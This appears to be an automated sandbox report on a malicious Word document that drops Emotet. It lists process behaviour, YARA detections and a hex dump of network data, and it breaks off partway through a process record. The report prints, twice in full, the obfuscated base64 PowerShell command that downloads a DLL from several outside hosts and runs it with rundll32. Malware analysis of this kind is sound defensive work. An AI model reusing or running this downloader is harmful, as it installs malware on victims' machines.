6c d3 37 2b 52 13 f7 d5 90 1a ea e1 1b e7 e6 93 20 79 ec 08 19 58 2b 61 fe 13 53 59 8f 93 5c 86 4a a8 b4 fd e0 f3 6d d5 7a e2 86 48 7a 55 c4 3d c4 ab e9 96 07 39 25 8d 7c ab 32 37 63 83 8a bb fe b7 72 15 73 08 ca 00 fb 24 23 d2 ca 98 42 8f 4d 6f 4c c5 b1 c1 ac a3 a0 48 7b 9f 01 ae bf d8 92 71 da 95 e6 01 ca 18 35 2e a2 b2 ed c3 e4 d2 71 25 53 e8 08 ae 46 09 05 ac 23 83 11 1c ca b2 c7 cc 2e a0 e1 94 39 67 94 5c 45 7e 90 be 4f 10 ad f6 f1 ed 1b 80 15 42 48 ec 35 b4 1a 68 bd 50 13 db 9c dc 23 b3 cb 40 e2 35 4e d6 7c 21 e3 47 cb 10 c1 0b cb 85 83 d8 cf 66 b1 3c db 51 ce 98 89 05 25 74 ef 42 73 ea 06 eb 73 fa 95 7b 6b 41 5c df de a3 23 25 a9 40 57 a0 7f a7 7e f4 16 57 f5 f5 c7 aa f1 cb e6 c4 65 1e ee 85 ff 0a dd 67 32 b5 18 d0 ed f2 f3 8c fc d3 9a 17 89 76 7b c5 d4 28 30 d2 94 5e f1 61 b8 1b f1 e9 51 51 4c 73 cd bc 5e 13 42 2d 17 5a 02 b8 82 a3 95 c1 25 66 33 f8 96 0b 50 c9 b7 15 eb 3e 8a 04 7a 8b 8f b2 ec 3a df 7a 20 8d cc 35 c0 f3 7e 30 77 19 9f e1 fb 23 7a 79 99 dd 92 74 13 e0 e5 45 bb 3d 83 3f 01 4d 4a 27 d4 68 08 85 a7 57 f3 38 e1 09 f6 a4 2a c1 66 fa e1 09 b5 2e 1b 8b c6 1e f4 20 3e 52 86 5c c3 7c d2 86 0b aa 98 f3 b8 ae de 2a f0 c4 a3 23 b9 a6 f8 03 ef 06 9d c3 1c a1 ad 80 c3 5e e8 66 a7 b2 6e 76 4a 12 5b 90 20 fc e5 ed 12 a2 2f 59 b7 25 b3 a5 57 08 ae 20 6d 75 da ed 3a f1 a5 10 c0 27 05 ae 66 88 62 7c 74 7a c2 06 7e 35 c8 cd 3f 2f 96 68 ca de 6e ad d9 bb b6 a7 bf 37 f6 02 b7 65 40 31 17 3e a9 c2 65 71 58 b6 b3 98 76 8f cf 4e 69 e5 3f 88 7e 99 7a d9 26 8c 18 94 39 4d 6d 5a f1 75 fe b0 6e 0a 9f e9 af ba 69 d7 0d ba 2d fc 2f ed 7d 27 a7 74 9e 36 9e f0 50 a4 ce 3a 02 2e 03 97 70 6a e0 a0 ad e2 ce 83 0a 13 f7 10 34 70 cf 13 5f d2 07 c1 85 cb d2 cb ed b1 fb 23 5b 42 a4 eb 79 82 e8 3b 98 17 28 d0 63 68 34 52 f4 ac 8f be 78 bd 69 14 f8 fb 3a 3a c5 93 ea 61 8e 8d 53 2e 14 84 0f c9 fd 1e ee c6 5d d2 c5 24 22 88 37 b3 a5 44 ae 54 bf aa 2c ce 4f c6 48 91 79 45 7b 06 2f 3c ca 3a 91 0a 59 c8 07 79 58 0b bf df 33 c8 39 01 e7 ca 95 e6 5b ab a5 ed e4 c3 8d f8 10 b3 85 76 75 12 a1 9f 0c 7e 17 a1 3d 0a 21 3e 3e ec 5e ec de b1 33 57 d4 a6 18 ed 7a 5e f6 8b a0 8f 33 e5 84 da 17 95 06 c6 81 5a 2a b0 41 b2 1e 5a e5 3a 82 b7 91 c0 9b 33 54 e9 66 77 f3 2d a6 0e 79 d0 96 f8 93 31 ce 42 a3 1f c1 b3 c7 dc cc 1a 42 98 a6 46 a0 b1 61 88 32 4a c8 dc 3b
                                              Data Ascii: 584rG."g]]_ m>{~Wu~d>Ht}H&vG|JT{+2#kqHNu|B^(v`!/5IJ^,z[`k:-DXiD/S3pc2)S2AwA b>9(km9gdDF`P`R/Kxlm8-km+|f0s.9Z2[#pSaHf;gxsc$vw-~ze!}Eiul7+R yX+aSY\JmzHzU=9%|27crs$#BMoLH{q5.q%SF#.9g\E~OBH5hP#@5N|!Gf<Q%tBss{kA\#%@W~Weg2v{(0^aQQLs^B-Z%f3P>z:z 5~0w#zytE=?MJ'hW8*f. >R\|*#^fnvJ[ /Y%W mu:'fb|tz~5?/hn7e@1>eqXvNi?~z&9MmZuni-/}'t6P:.pj4p_#[By;(ch4Rxi::aS.]$"7DT,OHyE{/<:YyX39[vu~=!>>^3Wz^3Z*AZ:3Tfw-y1BBFa2J;


                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: WINWORD.EXE PID: 2364 Parent PID: 584

                                              General

                                              Start time:18:44:35
                                              Start date:07/01/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                              Imagebase:0x13f780000
                                              File size:1424032 bytes
                                              MD5 hash:95C38D04597050285A18F66039EDB456
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: cmd.exe PID: 2412 Parent PID: 1220

                                              General

                                              Start time:18:44:37
                                              Start date:07/01/2021
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA
                                              Imagebase:0x4a7b0000
                                              File size:345088 bytes
                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Analysis Process: msg.exe PID: 2420 Parent PID: 2412

                                              General

                                              Start time:18:44:38
                                              Start date:07/01/2021
                                              Path:C:\Windows\System32\msg.exe
                                              Wow64 process (32bit):false
                                              Commandline:msg user /v Word experienced an error trying to open the file.
                                              Imagebase:0xff440000
                                              File size:26112 bytes
                                              MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Analysis Process: powershell.exe PID: 1976 Parent PID: 2412

                                              General

                                              Start time:18:44:38
                                              Start date:07/01/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA
                                              Imagebase:0x13fda0000
                                              File size:473600 bytes
                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2098977444.00000000003A6000.00000004.00000001.sdmp, Author: Florian Roth
                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2099018850.0000000001BC6000.00000004.00000001.sdmp, Author: Florian Roth
                                              Reputation:high

                                              Analysis Process: rundll32.exe PID: 2484 Parent PID: 1976

                                              General

                                              Start time:18:44:46
                                              Start date:07/01/2021
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                                              Imagebase:0xffaf0000
                                              File size:45568 bytes
                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Analysis Process: rundll32.exe PID: 2764 Parent PID: 2484

                                              General

                                              Start time:18:44:46
                                              Start date:07/01/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                                              Imagebase:0x1e0000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              Analysis Process: rundll32.exe PID: 2812 Parent PID: 2764

                                              General

                                              Start time:18:44:47
                                              Start date:07/01/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL
                                              Imagebase:0x1e0000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102822583.0000000000300000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              Analysis Process: rundll32.exe PID: 2688 Parent PID: 2812

                                              General

                                              Start time:18:44:47
                                              Start date:07/01/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL
                                              Imagebase:0x1e0000
                                              File size:44544 bytes
